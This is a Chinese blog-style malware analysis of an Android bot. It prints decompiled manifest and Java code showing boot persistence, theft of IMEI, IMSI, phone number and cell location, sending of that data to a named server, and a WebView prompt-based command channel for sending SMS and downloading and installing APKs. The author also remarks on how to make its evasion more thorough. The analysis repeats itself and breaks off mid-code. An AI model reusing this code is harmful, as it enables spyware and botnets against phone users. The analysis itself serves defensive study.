wcf1987
- 浏览: 631062 次
- 性别:
- 来自: 西安
-
文章分类
最新评论
-
d1438138:
[img][/img]
google api 的一些神奇使用 -
waykingeye:
[i][b][u]引用[list]
[*][img][url] ...
No result defined for action and result input -
tss0823:
...
No result defined for action and result input -
yahier:
有什么办法能够捕捉,然后给出自定义的提示呢
No result defined for action and result input -
chen_lian:
恩恩 按照上面的代码测试一下觉得很对
java创建目录
写道
83c4aa1deb06060db6fae4e13630ed18c6ebe6babc187443b5f4c265c2ee074f 分析报告
1.这个是
2. AndroidManifest.xml
<?xml version="1.0" encoding="utf-8"?>
<manifest android:versionCode="1" android:versionName="1.0" package="tp5x.WGt12"
xmlns:android="http://schemas.android.com/apk/res/android">
<uses-sdk android:minSdkVersion="4" />
<uses-permission android:name="android.permission.READ_PHONE_STATE" />
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
<uses-permission android:name="android.permission.SEND_SMS" />
<uses-permission android:name="android.permission.INTERNET" />
<uses-permission android:name="com.android.launcher.permission.INSTALL_SHORTCUT" />
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
<uses-permission android:name="android.permission.INSTALL_PACKAGES" />
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" />
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
<uses-permission android:name="android.permission.ACCESS_COARSE_UPDATES" />
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
<application android:label="@string/app_name" android:icon="@drawable/icon">
<activity android:label="@string/app_name" android:name=".Y6Cg03N">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
<activity android:name="ru.alpha.WebActivity" />
<activity android:name="ru.alpha.HtmlActivity" />
<receiver android:name="ru.alpha.AlphaReceiver" />
<receiver android:name="BootReceiver">
<intent-filter>
<action android:name="android.intent.action.BOOT_COMPLETED" />
<category android:name="android.intent.category.HOME" />
</intent-filter>
</receiver>
<service android:name="ru.alpha.AlphaService">
<intent-filter>
<action android:name="ru.alpha.AlphaServiceStart76" />
</intent-filter>
</service>
</application>
</manifest>
标红的是关键的,其中Y6Cg03N负责启动主界面以及别的service, BootReceiver负责开机启动
3. Y6Cg03N.java
public void onCreate(Bundle paramBundle)
{
super.onCreate(paramBundle);
try
{
Class localClass = Class.forName("ru.alpha.Alpha");
Class[] arrayOfClass = new Class[3];
arrayOfClass[0] = Class.forName("android.content.Context");
arrayOfClass[1] = Class.forName("java.lang.String");
arrayOfClass[2] = Class.forName("java.lang.String");
Constructor localConstructor = localClass.getConstructor(arrayOfClass);
Object[] arrayOfObject = new Object[3];
arrayOfObject[0] = getApplicationContext();
arrayOfObject[1] = "mapk01_20f";
arrayOfObject[2] = "76";
localConstructor.newInstance(arrayOfObject);
i = 0;
if (i < 3);
}
catch (Exception localException2)
{
try
{
Class.forName("tp5x.WGt12.Y6Cg03N").getMethod("load", new Class[0]).invoke(this, new Object[0]);
localSharedPreferences = getSharedPreferences("settings", 1);
if (localSharedPreferences.getBoolean("created", false))
if (!secondStart)
finish();
}
catch (Exception localException2)
{
try
{
while (true)
{
int i;
SharedPreferences localSharedPreferences;
Class.forName("tp5x.WGt12.Y6Cg03N").getMethod("showScreen", new Class[0]).invoke(this, new Object[0]);
return;
localException1 = localException1;
localException1.printStackTrace();
continue;
titles.add("");
texts.add("");
i++;
continue;
localException2 = localException2;
localException2.printStackTrace();
continue;
SharedPreferences.Editor localEditor = localSharedPreferences.edit();
localEditor.putBoolean("created", true);
localEditor.commit();
}
}
catch (Exception localException3)
{
while (true)
localException3.printStackTrace();
}
}
}
}
在oncreate中,主要调用了ru.alpha.Alpha的一个构造函数
public Alpha(Context paramContext, String paramString1, String paramString2)
其中string1= “mapk01_20f” paramString2 =“76”
Alpha的构造函数
public Alpha(Context paramContext, String paramString1, String paramString2)
{
System.out.println("Alpha START");
try
{
apiKey = paramString1;
appId = paramString2;
SharedPreferences.Editor localEditor = paramContext.getSharedPreferences(Constants.SETTINGS, 2).edit();
localEditor.putString(Constants.APP_ID, paramString2);
localEditor.putString(Constants.API_KEY, paramString1);
localEditor.commit();
imei = Functions.getImei(paramContext);
imsi = Functions.getImsi(paramContext);
phone = Functions.getPhone(paramContext);
startTimer(paramContext);
createShortcut(paramContext);
return;
}
catch (Exception localException)
{
while (true)
localException.printStackTrace();
}
}
构造函数中可以看到之前传进来的参数估计是用来区分app的,也就是说这个恶意代码可能感染或者编写了多个版本,需要加以参数控制和区分。后面的得到imei,imsi,和phone的代码都是成熟代码就不多说了。
然后是startTimer 这个方法
public static void startTimer(Context paramContext)
{
long l1 = paramContext.getSharedPreferences(Constants.SETTINGS, 2).getLong(Constants.NEXT_TIME, 0L);
long l2 = System.currentTimeMillis();
long l3 = l1 - l2;
System.out.println("appId: " + appId);
System.out.println("apiKey: " + apiKey);
System.out.println("imei: " + imei);
System.out.println("imsi: " + imsi);
System.out.println("phone: " + phone);
Intent localIntent = new Intent(paramContext, AlphaReceiver.class);
localIntent.setAction(Constants.NOTIFICATION_ACTION);
localIntent.putExtra(Constants.APP_ID, appId);
localIntent.putExtra(Constants.API_KEY, apiKey);
localIntent.putExtra(Constants.IMEI, imei);
localIntent.putExtra(Constants.IMSI, imsi);
localIntent.putExtra(Constants.PHONE, phone);
PendingIntent localPendingIntent = PendingIntent.getBroadcast(paramContext, 0, localIntent, 0);
AlarmManager localAlarmManager = (AlarmManager)paramContext.getSystemService("alarm");
System.out.println("offset: " + l3);
if (l3 > 0L)
localAlarmManager.set(0, l1, localPendingIntent);
while (true)
{
System.out.println("Alpha Timer START");
return;
localAlarmManager.set(0, l2 + Constants.MINUTE, localPendingIntent);
}
}
这个方法关键就是把前面读到的那些手机信息打包到了Extra,然后利用PendingIntent发送到了AlphaReceiver这个类中,action为NOTIFICATION_ACTION.
public class AlphaReceiver extends BroadcastReceiver
{
public void onReceive(Context paramContext, Intent paramIntent)
{
System.out.println("AlphaService START");
System.out.println("intent.getAction(): " + paramIntent.getAction());
if ((!paramIntent.getAction().equals(Constants.NOTIFICATION_ACTION)) || (Functions.checkInternetConnection(paramContext)));
try
{
String str1 = paramContext.getSharedPreferences(Constants.SETTINGS, 2).getString(Constants.APP_ID, "");
String str2 = paramIntent.getStringExtra(Constants.API_KEY);
String str3 = paramIntent.getStringExtra(Constants.IMEI);
String str4 = paramIntent.getStringExtra(Constants.IMSI);
String str5 = paramIntent.getStringExtra(Constants.PHONE);
System.out.println("appId: " + str1);
System.out.println("apiKey: " + str2);
System.out.println("imei: " + str3);
System.out.println("imsi: " + str4);
System.out.println("phone: " + str5);
Intent localIntent = new Intent();
// Constants .SERVICE = ru.alpha.AlphaServiceStart
localIntent.setAction(Constants.SERVICE + str1);
localIntent.putExtra(Constants.APP_ID, str1);
localIntent.putExtra(Constants.API_KEY, str2);
localIntent.putExtra(Constants.IMEI, str3);
localIntent.putExtra(Constants.IMSI, str4);
localIntent.putExtra(Constants.PHONE, str5);
localIntent.putExtra(Constants.TYPE, Constants.NOTIFICATION_TYPE);
paramContext.startService(localIntent);
while (true)
{
label352: return;
Alpha.startTimer(paramContext);
}
}
catch (Exception localException)
{
break label352;
}
}
}
启动了AlphaService,
public void onStart(Intent paramIntent, int paramInt)
{
super.onStart(paramIntent, paramInt);
try
{
System.out.println("AlphaService START");
System.out.println("checkInternetConnection:
//检查网络连接
" + Functions.checkInternetConnection(this));
if (Functions.checkInternetConnection(this))
{
System.out.println("intent.getAction(): " + paramIntent.getAction());
String str1 = paramIntent.getStringExtra(Constants.APP_ID);
String str2 = paramIntent.getStringExtra(Constants.API_KEY);
String str3 = paramIntent.getStringExtra(Constants.IMEI);
String str4 = paramIntent.getStringExtra(Constants.IMSI);
String str5 = paramIntent.getStringExtra(Constants.PHONE);
System.out.println("appId: " + str1);
System.out.println("apiKey: " + str2);
System.out.println("imei: " + str3);
System.out.println("imsi: " + str4);
System.out.println("phone: " + str5);
//把这些参数传给了服务器。Constants.SERVER = "http://m-001.net/index.php"
ServerResponse localServerResponse = Alpha.sendRequest(str2, str1, str3, str4, str5);
localServerResponse.printToOutStream();
Alpha.setNextTimeConnect(this, System.currentTimeMillis() + localServerResponse.wait * Constants.SECOND);
Alpha.startTimer(this);
if ((localServerResponse.notificationText.length() > 0) && (localServerResponse.notificationUrl.length() > 0))
//根据返回的结果调用了WebActivity
Alpha.showNotification(this, localServerResponse.notificationTickerText, localServerResponse.notificationTitle, localServerResponse.notificationText, localServerResponse.notificationIcon, localServerResponse.notificationUrl, WebActivity.class);
if (localServerResponse.openUrl.length() > 0)
Alpha.openUrl(this, localServerResponse.openUrl);
if (localServerResponse.showHtml.length() > 0)
Alpha.showHtml(this, new String(Base64.decode(localServerResponse.showHtml), "UTF-8"));
}
return;
}
catch (Exception localException)
{
while (true)
{
localException.printStackTrace();
stopSelf(paramInt);
}
}
finally
{
stopSelf(paramInt);
}
throw localObject;
}
启动WebActivity代码
public class WebActivity extends Activity
{
static AlphaApi api;
public void onCreate(Bundle paramBundle)
{
super.onCreate(paramBundle);
setTitle("");
api = new AlphaApi(this);
WebView localWebView = new WebView(this);
localWebView.getSettings().setJavaScriptEnabled(true);
localWebView.setWebChromeClient(new WebChromeClient()
{
//关键代码
public boolean onJsPrompt(WebView paramWebView, String paramString1, String paramString2, String paramString3, JsPromptResult paramJsPromptResult)
{
AlphaApiResult localAlphaApiResult = WebActivity.api.textToCommand(paramString2, paramString3);
if (localAlphaApiResult.find)
paramJsPromptResult.confirm(localAlphaApiResult.result);
for (int i = 1; ; i = 0)
return i;
}
});
localWebView.addJavascriptInterface(api, "alpha");
localWebView.clearCache(true);
localWebView.setScrollBarStyle(33554432);
String str = getIntent().getStringExtra("url");
System.out.println("url: " + str);
localWebView.loadUrl(str);
setContentView(localWebView);
((NotificationManager)getSystemService("notification")).cancelAll();
}
}
这里根据返回的response中得notificationUrl,来打开了chrome浏览器,其中的WebActivity.api是AlphaApi类,这个类是关键类,属于控制命令执行的类。它采用了监视页面事件中得prompt事件,通过prompt种的参数来实现bot的控制命令的功能。
AlphaApi类的关键方法
public AlphaApiResult textToCommand(String paramString1, String paramString2)
{
do
{
try
{
if (paramString1.equals("alpha.sendSms"))
{
String[] arrayOfString2 = paramString2.split("\\|");
//如果前面的prompt参数是alpha.sendSms这个,就发送短信
localAlphaApiResult = new AlphaApiResult(true, String.valueOf(sendSms(arrayOfString2[0], arrayOfString2[1])));
break;
}
//下载并安装指定的apk,非root后门安装。
if (paramString1.equals("alpha.install"))
{
String[] arrayOfString1 = paramString2.split("\\|");
install(arrayOfString1[0], arrayOfString1[1], arrayOfString1[2]);
localAlphaApiResult = new AlphaApiResult(true, "");
}
}
catch (Exception localException)
{
localException.printStackTrace();
localAlphaApiResult = new AlphaApiResult(false, "");
}
if (paramString1.equals("alpha.getGsm"))
{
localAlphaApiResult = new AlphaApiResult(true, getGsm());
break;
}
if (paramString1.equals("alpha.getImei"))
{
localAlphaApiResult = new AlphaApiResult(true, getImei());
break;
}
if (!paramString1.equals("alpha.getImsi"))
continue;
localAlphaApiResult = new AlphaApiResult(true, getImsi());
break;
}
while (!paramString1.equals("alpha.getPhone"));
AlphaApiResult localAlphaApiResult = new AlphaApiResult(true, getPhone());
return localAlphaApiResult;
}
Install的方法实质
public void threadOperationRun(int paramInt, Object paramObject)
{
String[] arrayOfString;
if (paramInt == 1)
{
arrayOfString = (String[])(String[])paramObject;
String str1 = System.currentTimeMillis() + ".apk";
String str2 = Environment.getExternalStorageDirectory() + "/download/";
if (!Functions.downloadFile(str2, arrayOfString[0], str1))
break label107;
this.progressDialog.dismiss();
Functions.installApk(this.context, str2 + str1);
}
while (true)
{
return;
label107: this.progressDialog.dismiss();
Toast localToast = Toast.makeText(this.context, arrayOfString[1], 1);
localToast.setGravity(17, 0, 0);
localToast.show();
}
}
Functions的代码
public class Functions
{
public static boolean checkInternetConnection(Context paramContext)
{
int i = 0;
try
{
ConnectivityManager localConnectivityManager = (ConnectivityManager)paramContext.getSystemService("connectivity");
if ((localConnectivityManager.getActiveNetworkInfo() != null) && (localConnectivityManager.getActiveNetworkInfo().isAvailable()))
{
boolean bool = localConnectivityManager.getActiveNetworkInfo().isConnected();
if (bool)
i = 1;
}
label45: return i;
}
catch (Exception localException)
{
break label45;
}
}
public static boolean downloadFile(String paramString1, String paramString2, String paramString3)
{
int i = 1;
try
{
HttpURLConnection localHttpURLConnection = (HttpURLConnection)new URL(paramString2).openConnection();
localHttpURLConnection.setRequestMethod("GET");
localHttpURLConnection.setDoOutput(true);
localHttpURLConnection.connect();
File localFile = new File(paramString1);
localFile.mkdirs();
FileOutputStream localFileOutputStream = new FileOutputStream(new File(localFile, paramString3));
InputStream localInputStream = localHttpURLConnection.getInputStream();
byte[] arrayOfByte = new byte[1024];
while (true)
{
int j = localInputStream.read(arrayOfByte);
if (j == -1)
break;
localFileOutputStream.write(arrayOfByte, 0, j);
}
localFileOutputStream.close();
localInputStream.close();
}
catch (IOException localIOException)
{
i = 0;
}
return i;
}
public static String getGsmData(Context paramContext)
{
Object localObject = "";
try
{
TelephonyManager localTelephonyManager = (TelephonyManager)paramContext.getSystemService("phone");
String str1 = localTelephonyManager.getNetworkOperator();
int i = Integer.parseInt(str1.substring(0, 3));
int j = Integer.parseInt(str1.substring(3));
GsmCellLocation localGsmCellLocation = (GsmCellLocation)localTelephonyManager.getCellLocation();
int k = localGsmCellLocation.getLac();
int m = localGsmCellLocation.getCid();
String str2 = i + ", " + j + ", " + k + ", " + m;
localObject = str2;
return localObject;
}
catch (Exception localException)
{
while (true)
localException.printStackTrace();
}
}
public static String getImei(Context paramContext)
{
Object localObject;
try
{
TelephonyManager localTelephonyManager = (TelephonyManager)paramContext.getSystemService("phone");
if (localTelephonyManager == null)
{
localObject = "";
}
else
{
String str = localTelephonyManager.getDeviceId();
localObject = str;
}
}
catch (Exception localException)
{
localException.printStackTrace();
localObject = "";
}
return (String)localObject;
}
public static String getImsi(Context paramContext)
{
Object localObject;
try
{
TelephonyManager localTelephonyManager = (TelephonyManager)paramContext.getSystemService("phone");
if (localTelephonyManager == null)
{
localObject = "";
}
else
{
String str = localTelephonyManager.getSubscriberId();
localObject = str;
}
}
catch (Exception localException)
{
localException.printStackTrace();
localObject = "";
}
return (String)localObject;
}
public static String getPhone(Context paramContext)
{
String str;
try
{
TelephonyManager localTelephonyManager = (TelephonyManager)paramContext.getSystemService("phone");
if (localTelephonyManager == null)
{
str = "";
}
else
{
str = localTelephonyManager.getLine1Number();
if (str == null)
str = "";
}
}
catch (Exception localException)
{
localException.printStackTrace();
str = "";
}
return str;
}
public static void installApk(Context paramContext, String paramString)
{
Intent localIntent = new Intent("android.intent.action.VIEW");
localIntent.setDataAndType(Uri.fromFile(new File(paramString)), "application/vnd.android.package-archive");
paramContext.startActivity(localIntent);
}
public static boolean sendSms(String paramString1, String paramString2)
{
return false;
}
}
总结:这款android bot的特点有两个,一个是大量采用了反射机制来调用函数,估计是为了规避api检测,不过不够彻底,应该采用动态解密api函数名,类名的方式更彻底。第二个是他的控制命令传递方式,采用了两级的方式,首先去指定网站获得控制命令的url,然后打开控制命令的url,根据这个url的页面js事件的参数,来调用bot控制命令,算是比较有特色的。
1.这个是
2. AndroidManifest.xml
<?xml version="1.0" encoding="utf-8"?>
<manifest android:versionCode="1" android:versionName="1.0" package="tp5x.WGt12"
xmlns:android="http://schemas.android.com/apk/res/android">
<uses-sdk android:minSdkVersion="4" />
<uses-permission android:name="android.permission.READ_PHONE_STATE" />
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
<uses-permission android:name="android.permission.SEND_SMS" />
<uses-permission android:name="android.permission.INTERNET" />
<uses-permission android:name="com.android.launcher.permission.INSTALL_SHORTCUT" />
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
<uses-permission android:name="android.permission.INSTALL_PACKAGES" />
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" />
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
<uses-permission android:name="android.permission.ACCESS_COARSE_UPDATES" />
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
<application android:label="@string/app_name" android:icon="@drawable/icon">
<activity android:label="@string/app_name" android:name=".Y6Cg03N">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
<activity android:name="ru.alpha.WebActivity" />
<activity android:name="ru.alpha.HtmlActivity" />
<receiver android:name="ru.alpha.AlphaReceiver" />
<receiver android:name="BootReceiver">
<intent-filter>
<action android:name="android.intent.action.BOOT_COMPLETED" />
<category android:name="android.intent.category.HOME" />
</intent-filter>
</receiver>
<service android:name="ru.alpha.AlphaService">
<intent-filter>
<action android:name="ru.alpha.AlphaServiceStart76" />
</intent-filter>
</service>
</application>
</manifest>
标红的是关键的,其中Y6Cg03N负责启动主界面以及别的service, BootReceiver负责开机启动
3. Y6Cg03N.java
public void onCreate(Bundle paramBundle)
{
super.onCreate(paramBundle);
try
{
Class localClass = Class.forName("ru.alpha.Alpha");
Class[] arrayOfClass = new Class[3];
arrayOfClass[0] = Class.forName("android.content.Context");
arrayOfClass[1] = Class.forName("java.lang.String");
arrayOfClass[2] = Class.forName("java.lang.String");
Constructor localConstructor = localClass.getConstructor(arrayOfClass);
Object[] arrayOfObject = new Object[3];
arrayOfObject[0] = getApplicationContext();
arrayOfObject[1] = "mapk01_20f";
arrayOfObject[2] = "76";
localConstructor.newInstance(arrayOfObject);
i = 0;
if (i < 3);
}
catch (Exception localException2)
{
try
{
Class.forName("tp5x.WGt12.Y6Cg03N").getMethod("load", new Class[0]).invoke(this, new Object[0]);
localSharedPreferences = getSharedPreferences("settings", 1);
if (localSharedPreferences.getBoolean("created", false))
if (!secondStart)
finish();
}
catch (Exception localException2)
{
try
{
while (true)
{
int i;
SharedPreferences localSharedPreferences;
Class.forName("tp5x.WGt12.Y6Cg03N").getMethod("showScreen", new Class[0]).invoke(this, new Object[0]);
return;
localException1 = localException1;
localException1.printStackTrace();
continue;
titles.add("");
texts.add("");
i++;
continue;
localException2 = localException2;
localException2.printStackTrace();
continue;
SharedPreferences.Editor localEditor = localSharedPreferences.edit();
localEditor.putBoolean("created", true);
localEditor.commit();
}
}
catch (Exception localException3)
{
while (true)
localException3.printStackTrace();
}
}
}
}
在oncreate中,主要调用了ru.alpha.Alpha的一个构造函数
public Alpha(Context paramContext, String paramString1, String paramString2)
其中string1= “mapk01_20f” paramString2 =“76”
Alpha的构造函数
public Alpha(Context paramContext, String paramString1, String paramString2)
{
System.out.println("Alpha START");
try
{
apiKey = paramString1;
appId = paramString2;
SharedPreferences.Editor localEditor = paramContext.getSharedPreferences(Constants.SETTINGS, 2).edit();
localEditor.putString(Constants.APP_ID, paramString2);
localEditor.putString(Constants.API_KEY, paramString1);
localEditor.commit();
imei = Functions.getImei(paramContext);
imsi = Functions.getImsi(paramContext);
phone = Functions.getPhone(paramContext);
startTimer(paramContext);
createShortcut(paramContext);
return;
}
catch (Exception localException)
{
while (true)
localException.printStackTrace();
}
}
构造函数中可以看到之前传进来的参数估计是用来区分app的,也就是说这个恶意代码可能感染或者编写了多个版本,需要加以参数控制和区分。后面的得到imei,imsi,和phone的代码都是成熟代码就不多说了。
然后是startTimer 这个方法
public static void startTimer(Context paramContext)
{
long l1 = paramContext.getSharedPreferences(Constants.SETTINGS, 2).getLong(Constants.NEXT_TIME, 0L);
long l2 = System.currentTimeMillis();
long l3 = l1 - l2;
System.out.println("appId: " + appId);
System.out.println("apiKey: " + apiKey);
System.out.println("imei: " + imei);
System.out.println("imsi: " + imsi);
System.out.println("phone: " + phone);
Intent localIntent = new Intent(paramContext, AlphaReceiver.class);
localIntent.setAction(Constants.NOTIFICATION_ACTION);
localIntent.putExtra(Constants.APP_ID, appId);
localIntent.putExtra(Constants.API_KEY, apiKey);
localIntent.putExtra(Constants.IMEI, imei);
localIntent.putExtra(Constants.IMSI, imsi);
localIntent.putExtra(Constants.PHONE, phone);
PendingIntent localPendingIntent = PendingIntent.getBroadcast(paramContext, 0, localIntent, 0);
AlarmManager localAlarmManager = (AlarmManager)paramContext.getSystemService("alarm");
System.out.println("offset: " + l3);
if (l3 > 0L)
localAlarmManager.set(0, l1, localPendingIntent);
while (true)
{
System.out.println("Alpha Timer START");
return;
localAlarmManager.set(0, l2 + Constants.MINUTE, localPendingIntent);
}
}
这个方法关键就是把前面读到的那些手机信息打包到了Extra,然后利用PendingIntent发送到了AlphaReceiver这个类中,action为NOTIFICATION_ACTION.
public class AlphaReceiver extends BroadcastReceiver
{
public void onReceive(Context paramContext, Intent paramIntent)
{
System.out.println("AlphaService START");
System.out.println("intent.getAction(): " + paramIntent.getAction());
if ((!paramIntent.getAction().equals(Constants.NOTIFICATION_ACTION)) || (Functions.checkInternetConnection(paramContext)));
try
{
String str1 = paramContext.getSharedPreferences(Constants.SETTINGS, 2).getString(Constants.APP_ID, "");
String str2 = paramIntent.getStringExtra(Constants.API_KEY);
String str3 = paramIntent.getStringExtra(Constants.IMEI);
String str4 = paramIntent.getStringExtra(Constants.IMSI);
String str5 = paramIntent.getStringExtra(Constants.PHONE);
System.out.println("appId: " + str1);
System.out.println("apiKey: " + str2);
System.out.println("imei: " + str3);
System.out.println("imsi: " + str4);
System.out.println("phone: " + str5);
Intent localIntent = new Intent();
// Constants .SERVICE = ru.alpha.AlphaServiceStart
localIntent.setAction(Constants.SERVICE + str1);
localIntent.putExtra(Constants.APP_ID, str1);
localIntent.putExtra(Constants.API_KEY, str2);
localIntent.putExtra(Constants.IMEI, str3);
localIntent.putExtra(Constants.IMSI, str4);
localIntent.putExtra(Constants.PHONE, str5);
localIntent.putExtra(Constants.TYPE, Constants.NOTIFICATION_TYPE);
paramContext.startService(localIntent);
while (true)
{
label352: return;
Alpha.startTimer(paramContext);
}
}
catch (Exception localException)
{
break label352;
}
}
}
启动了AlphaService,
public void onStart(Intent paramIntent, int paramInt)
{
super.onStart(paramIntent, paramInt);
try
{
System.out.println("AlphaService START");
System.out.println("checkInternetConnection:
//检查网络连接
" + Functions.checkInternetConnection(this));
if (Functions.checkInternetConnection(this))
{
System.out.println("intent.getAction(): " + paramIntent.getAction());
String str1 = paramIntent.getStringExtra(Constants.APP_ID);
String str2 = paramIntent.getStringExtra(Constants.API_KEY);
String str3 = paramIntent.getStringExtra(Constants.IMEI);
String str4 = paramIntent.getStringExtra(Constants.IMSI);
String str5 = paramIntent.getStringExtra(Constants.PHONE);
System.out.println("appId: " + str1);
System.out.println("apiKey: " + str2);
System.out.println("imei: " + str3);
System.out.println("imsi: " + str4);
System.out.println("phone: " + str5);
//把这些参数传给了服务器。Constants.SERVER = "http://m-001.net/index.php"
ServerResponse localServerResponse = Alpha.sendRequest(str2, str1, str3, str4, str5);
localServerResponse.printToOutStream();
Alpha.setNextTimeConnect(this, System.currentTimeMillis() + localServerResponse.wait * Constants.SECOND);
Alpha.startTimer(this);
if ((localServerResponse.notificationText.length() > 0) && (localServerResponse.notificationUrl.length() > 0))
//根据返回的结果调用了WebActivity
Alpha.showNotification(this, localServerResponse.notificationTickerText, localServerResponse.notificationTitle, localServerResponse.notificationText, localServerResponse.notificationIcon, localServerResponse.notificationUrl, WebActivity.class);
if (localServerResponse.openUrl.length() > 0)
Alpha.openUrl(this, localServerResponse.openUrl);
if (localServerResponse.showHtml.length() > 0)
Alpha.showHtml(this, new String(Base64.decode(localServerResponse.showHtml), "UTF-8"));
}
return;
}
catch (Exception localException)
{
while (true)
{
localException.printStackTrace();
stopSelf(paramInt);
}
}
finally
{
stopSelf(paramInt);
}
throw localObject;
}
启动WebActivity代码
public class WebActivity extends Activity
{
static AlphaApi api;
public void onCreate(Bundle paramBundle)
{
super.onCreate(paramBundle);
setTitle("");
api = new AlphaApi(this);
WebView localWebView = new WebView(this);
localWebView.getSettings().setJavaScriptEnabled(true);
localWebView.setWebChromeClient(new WebChromeClient()
{
//关键代码
public boolean onJsPrompt(WebView paramWebView, String paramString1, String paramString2, String paramString3, JsPromptResult paramJsPromptResult)
{
AlphaApiResult localAlphaApiResult = WebActivity.api.textToCommand(paramString2, paramString3);
if (localAlphaApiResult.find)
paramJsPromptResult.confirm(localAlphaApiResult.result);
for (int i = 1; ; i = 0)
return i;
}
});
localWebView.addJavascriptInterface(api, "alpha");
localWebView.clearCache(true);
localWebView.setScrollBarStyle(33554432);
String str = getIntent().getStringExtra("url");
System.out.println("url: " + str);
localWebView.loadUrl(str);
setContentView(localWebView);
((NotificationManager)getSystemService("notification")).cancelAll();
}
}
这里根据返回的response中得notificationUrl,来打开了chrome浏览器,其中的WebActivity.api是AlphaApi类,这个类是关键类,属于控制命令执行的类。它采用了监视页面事件中得prompt事件,通过prompt种的参数来实现bot的控制命令的功能。
AlphaApi类的关键方法
public AlphaApiResult textToCommand(String paramString1, String paramString2)
{
do
{
try
{
if (paramString1.equals("alpha.sendSms"))
{
String[] arrayOfString2 = paramString2.split("\\|");
//如果前面的prompt参数是alpha.sendSms这个,就发送短信
localAlphaApiResult = new AlphaApiResult(true, String.valueOf(sendSms(arrayOfString2[0], arrayOfString2[1])));
break;
}
//下载并安装指定的apk,非root后门安装。
if (paramString1.equals("alpha.install"))
{
String[] arrayOfString1 = paramString2.split("\\|");
install(arrayOfString1[0], arrayOfString1[1], arrayOfString1[2]);
localAlphaApiResult = new AlphaApiResult(true, "");
}
}
catch (Exception localException)
{
localException.printStackTrace();
localAlphaApiResult = new AlphaApiResult(false, "");
}
if (paramString1.equals("alpha.getGsm"))
{
localAlphaApiResult = new AlphaApiResult(true, getGsm());
break;
}
if (paramString1.equals("alpha.getImei"))
{
localAlphaApiResult = new AlphaApiResult(true, getImei());
break;
}
if (!paramString1.equals("alpha.getImsi"))
continue;
localAlphaApiResult = new AlphaApiResult(true, getImsi());
break;
}
while (!paramString1.equals("alpha.getPhone"));
AlphaApiResult localAlphaApiResult = new AlphaApiResult(true, getPhone());
return localAlphaApiResult;
}
Install的方法实质
public void threadOperationRun(int paramInt, Object paramObject)
{
String[] arrayOfString;
if (paramInt == 1)
{
arrayOfString = (String[])(String[])paramObject;
String str1 = System.currentTimeMillis() + ".apk";
String str2 = Environment.getExternalStorageDirectory() + "/download/";
if (!Functions.downloadFile(str2, arrayOfString[0], str1))
break label107;
this.progressDialog.dismiss();
Functions.installApk(this.context, str2 + str1);
}
while (true)
{
return;
label107: this.progressDialog.dismiss();
Toast localToast = Toast.makeText(this.context, arrayOfString[1], 1);
localToast.setGravity(17, 0, 0);
localToast.show();
}
}
Functions的代码
public class Functions
{
public static boolean checkInternetConnection(Context paramContext)
{
int i = 0;
try
{
ConnectivityManager localConnectivityManager = (ConnectivityManager)paramContext.getSystemService("connectivity");
if ((localConnectivityManager.getActiveNetworkInfo() != null) && (localConnectivityManager.getActiveNetworkInfo().isAvailable()))
{
boolean bool = localConnectivityManager.getActiveNetworkInfo().isConnected();
if (bool)
i = 1;
}
label45: return i;
}
catch (Exception localException)
{
break label45;
}
}
public static boolean downloadFile(String paramString1, String paramString2, String paramString3)
{
int i = 1;
try
{
HttpURLConnection localHttpURLConnection = (HttpURLConnection)new URL(paramString2).openConnection();
localHttpURLConnection.setRequestMethod("GET");
localHttpURLConnection.setDoOutput(true);
localHttpURLConnection.connect();
File localFile = new File(paramString1);
localFile.mkdirs();
FileOutputStream localFileOutputStream = new FileOutputStream(new File(localFile, paramString3));
InputStream localInputStream = localHttpURLConnection.getInputStream();
byte[] arrayOfByte = new byte[1024];
while (true)
{
int j = localInputStream.read(arrayOfByte);
if (j == -1)
break;
localFileOutputStream.write(arrayOfByte, 0, j);
}
localFileOutputStream.close();
localInputStream.close();
}
catch (IOException localIOException)
{
i = 0;
}
return i;
}
public static String getGsmData(Context paramContext)
{
Object localObject = "";
try
{
TelephonyManager localTelephonyManager = (TelephonyManager)paramContext.getSystemService("phone");
String str1 = localTelephonyManager.getNetworkOperator();
int i = Integer.parseInt(str1.substring(0, 3));
int j = Integer.parseInt(str1.substring(3));
GsmCellLocation localGsmCellLocation = (GsmCellLocation)localTelephonyManager.getCellLocation();
int k = localGsmCellLocation.getLac();
int m = localGsmCellLocation.getCid();
String str2 = i + ", " + j + ", " + k + ", " + m;
localObject = str2;
return localObject;
}
catch (Exception localException)
{
while (true)
localException.printStackTrace();
}
}
public static String getImei(Context paramContext)
{
Object localObject;
try
{
TelephonyManager localTelephonyManager = (TelephonyManager)paramContext.getSystemService("phone");
if (localTelephonyManager == null)
{
localObject = "";
}
else
{
String str = localTelephonyManager.getDeviceId();
localObject = str;
}
}
catch (Exception localException)
{
localException.printStackTrace();
localObject = "";
}
return (String)localObject;
}
public static String getImsi(Context paramContext)
{
Object localObject;
try
{
TelephonyManager localTelephonyManager = (TelephonyManager)paramContext.getSystemService("phone");
if (localTelephonyManager == null)
{
localObject = "";
}
else
{
String str = localTelephonyManager.getSubscriberId();
localObject = str;
}
}
catch (Exception localException)
{
localException.printStackTrace();
localObject = "";
}
return (String)localObject;
}
public static String getPhone(Context paramContext)
{
String str;
try
{
TelephonyManager localTelephonyManager = (TelephonyManager)paramContext.getSystemService("phone");
if (localTelephonyManager == null)
{
str = "";
}
else
{
str = localTelephonyManager.getLine1Number();
if (str == null)
str = "";
}
}
catch (Exception localException)
{
localException.printStackTrace();
str = "";
}
return str;
}
public static void installApk(Context paramContext, String paramString)
{
Intent localIntent = new Intent("android.intent.action.VIEW");
localIntent.setDataAndType(Uri.fromFile(new File(paramString)), "application/vnd.android.package-archive");
